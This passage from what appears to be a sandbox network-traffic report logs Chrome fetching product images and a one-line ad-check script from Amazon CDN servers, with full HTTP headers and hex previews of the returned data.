                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 5275
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: ab290550-ce6c-4166-b33b-358704e57eea
                                                                                                                                                                                                                                                                      Date: Mon, 29 Jul 2024 09:42:52 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 23 Jul 2024 07:16:18 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-479,/images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871139_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      Expires: Sun, 24 Jul 2044 09:42:52 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-479 /images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871139_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 8e8e0fdfe938f4dbcfa8bb4284454f5a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 403118
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: MoZZ7sL9LZ8mGlxTyp87jwTzp4bTMWq9gggNmYiWEBBESK4g42AHkQ==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC5275INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 14 0f 0f 0c 0f 0f 1a 13 0e 13 11 18 0f 11 11 18 11 18 18 11 15 18 15 15 1b 18 14 14 18 1b 15 18 19 25 19 1d 1a 20 1b 19 23 19 25 19 25 24 24 26 29 2a 25 18 29 38 01 09 09 05 09 09 09 0c 09 09 14 23 18 0f 1b 24 1d 0c 19 2b 24 2a 1b 24 26 24 24 1a 2f 24 2a 23 24 15 25 24 1b 20 20 1b 1b 1d 19 1d 24 1b 26 26 25 0f 1a 26 23 18 32 1a 1b 18 24 23 29 20 18 26 2d ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 ab 00 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 00 05 06 07 08 01 02 04 03 10 00 02 01 03 03 01 04 06 07 04 09 04 03 00 00 00 01 02 03 00 04 11 05 12 21 06 07 13 31 41 14 32 51 52 61 91 15 16 22 71 81 b2 d2 35 74 93 d1 23 24 34 42
                                                                                                                                                                                                                                                                      Data Ascii: JFIF% #%%$$&)*%)8#$+$*$&$$/$*#$%$ $&&%&#2$#) &-t"!1A2QRa"q5t#$4B


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      109192.168.2.54983418.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC421OUTGET /images/G/01/csm/showads.v2.js?category=ad&adstype=-ad-column-&ad_size=-housead- HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC860INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                      Content-Length: 23
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 33f1f560-69cb-44ca-8283-57428aa8b170
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 28 Nov 2016 08:22:04 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-098,/images/G/01/csm/showads.v2
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-098 /images/G/01/csm/showads.v2
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 08:07:59 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=86400,public
                                                                                                                                                                                                                                                                      Expires: Thu, 22 Aug 2024 06:43:35 GMT
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      Via: 1.1 ffde4ac468ae53bebcf62edbe5888ab6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 38196
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: mENes9pvhmwfRhy9Z30drtY1nFBgwdZ8fD2Rqs3jegxhcEKr5vNsOg==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC23INData Raw: 77 69 6e 64 6f 77 2e 75 65 5f 61 64 62 5f 63 68 6b 20 3d 20 31 3b 0a
                                                                                                                                                                                                                                                                      Data Ascii: window.ue_adb_chk = 1;


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      110192.168.2.54983518.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC378OUTGET /images/I/41qWHXXnEKL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC840INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 6523
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 41a25900-5a7c-4aeb-992a-531fa8a6db2d
                                                                                                                                                                                                                                                                      Date: Mon, 19 Aug 2024 08:08:41 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 04 Mar 2024 16:57:33 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-060,/images/I/41qWHXXnEKL
                                                                                                                                                                                                                                                                      Expires: Sun, 14 Aug 2044 08:08:41 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-060 /images/I/41qWHXXnEKL
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 31d06ae261b40b074730272856c3fe20.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 20521
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: 3d-hlxBIDA-5P9d9X80A-ac5jnXVDxdzogP4pYQj0hPr_SXXXx6nbA==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC6523INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 07 08 01 05 06 04 02 03 09 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 03 04 02 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b9 60 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4`


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      111192.168.2.54983718.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC378OUTGET /images/I/3153Pv75-uS._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1014INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 3486
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: a74301e7-6aba-48c1-a54a-201d4a298095
                                                                                                                                                                                                                                                                      Date: Sun, 18 Aug 2024 15:29:59 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Wed, 09 Jun 2021 08:41:06 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-747,/images/I/3153Pv75-uS
                                                                                                                                                                                                                                                                      Expires: Sat, 13 Aug 2044 15:29:59 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-747 /images/I/3153Pv75-uS
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 a66afeef05dba31abba2c6cbc2eaa73c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 269927
                                                                                                                                                                                                                                                                      Server-Timing: cdn-cache-hit,cdn-pop;desc="AMS58-P5",cdn-rid;desc="z73vT7xcAgem4YPCc9HgdNWf-KePAAP9UtJvn9j18kHPir_96L0Dzg==",cdn-hit-layer;desc="Origin Shield",cdn-downstream-fbl;dur=102,provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: z73vT7xcAgem4YPCc9HgdNWf-KePAAP9UtJvn9j18kHPir_96L0Dzg==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC3486INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 08 03 04 05 06 07 02 01 01 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 04 05 01 02 03 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 99 60 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4`


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      112192.168.2.54983818.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC378OUTGET /images/I/31qszhAmmGL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC829INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 3506
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 35a35e33-3d90-4d52-9ebc-e7dc8b8b5b7c
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 06:40:12 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Wed, 21 Feb 2024 12:56:11 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-352,/images/I/31qszhAmmGL
                                                                                                                                                                                                                                                                      Expires: Tue, 16 Aug 2044 06:40:12 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-352 /images/I/31qszhAmmGL
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 c42cd753c9927a74eed5ac8cd899bf30.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: VfPRXMA2Cw5BYM6f3jAUI9A4ErFlg90Xrga-PJ-jXSIjfRzOuNxpwg==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC3506INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 06 02 03 04 05 07 01 08 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 01 06 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fb 2c 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4,


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      113192.168.2.54984118.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC378OUTGET /images/I/31eMENCjajL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC842INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 4007
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: cb386bc8-c326-425b-9852-ce67f5179c92
                                                                                                                                                                                                                                                                      Date: Tue, 23 Jul 2024 01:37:24 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 03 Oct 2023 08:50:08 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-381,/images/I/31eMENCjajL
                                                                                                                                                                                                                                                                      Expires: Mon, 18 Jul 2044 01:37:24 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-381 /images/I/31eMENCjajL
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 cb6a2c71695f851967f08ee8b2defc0c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 1089636
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: Dcqnl_JeZ6R1n9Hg_YV6eoFaTfz2y9VvUMe3FFXaUQqzhu484n7Gpg==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC4007INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 04 05 06 08 03 07 09 02 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 dc b0 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"3


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      114192.168.2.54984218.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC689OUTGET /images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871141_186x116_1X_en_AE._SY116_CB569183660_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC931INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 5855
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 8e550391-f49e-418c-810a-fad872950b30
                                                                                                                                                                                                                                                                      Date: Mon, 19 Aug 2024 05:33:43 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 23 Jul 2024 07:16:18 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-922,/images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871141_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      Expires: Sun, 14 Aug 2044 05:33:43 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-922 /images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871141_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 03335b4388aac682bcebdd7893781376.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 219303
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: djV_dLBtY_B7-3glQHXflWvNDg763U3rsjwESgwO41rSpyQ4DHbF4g==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC5855INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 02 02 02 04 03 04 04 04 04 06 09 07 07 06 07 07 0c 09 07 09 08 0b 07 08 08 0b 08 0b 0b 08 0a 0b 0a 0a 0d 0b 09 09 0b 0d 0a 0b 0c 11 0c 0e 0c 0f 0d 0c 10 0c 11 0c 11 10 10 11 13 13 11 0b 13 1a 01 04 04 02 04 04 04 06 04 04 09 10 0b 07 0d 10 0e 06 0c 14 10 13 0d 10 11 10 10 0c 16 10 13 10 10 0a 11 10 0d 0f 0f 0d 0d 0e 0c 0e 10 0d 11 11 11 07 0c 11 10 0b 17 0c 0d 0b 10 10 13 0f 0b 11 15 ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 be 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 06 07 08 09 02 03 05 04 01 10 00 02 01 03 02 03 04 05 06 09 09 07 05 00 00 00 02 03 04 00 05 12 06 13 01 07 22 14 32 42 52 08 11 23 33 62 15 17 53 72 92 d3 16 21 24 31 43 74 82 b2
                                                                                                                                                                                                                                                                      Data Ascii: JFIFt""2BR#3bSr!$1Ct


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      115192.168.2.54984052.222.236.764432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
